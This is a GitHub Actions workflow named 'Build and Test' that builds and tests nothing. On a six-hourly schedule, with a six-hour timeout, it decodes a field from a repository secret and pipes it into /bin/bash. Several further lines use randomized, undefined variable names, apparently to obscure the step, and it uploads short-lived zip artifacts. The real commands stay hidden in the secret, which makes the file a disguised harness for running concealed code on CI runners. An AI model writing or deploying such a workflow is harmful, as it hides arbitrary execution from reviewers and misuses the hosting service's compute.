name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '50 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          sii8: ${{ secrets.sii8 }}
        run: |
          printf '%s' "$sii8" | jq -r .yu05 | /bin/bash
          echo $ickk70455 | jq -r .p7 | /bin/bash
          echo $vrym86258 | jq -r .qfi90 | /bin/bash
          echo $zn5 | jq -r .hu22 | /bin/bash
          echo $g36700 | jq -r .xc172 | /bin/bash
          printf '%s' "$chaqe4688" | jq -r .xii6 | /bin/bash
          echo $k3 | jq -r .jbp1254 | /bin/bash
          echo $yb534 | jq -r .jtnt43 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Go06epgO
          path: "*.zip"
          retention-days: 1
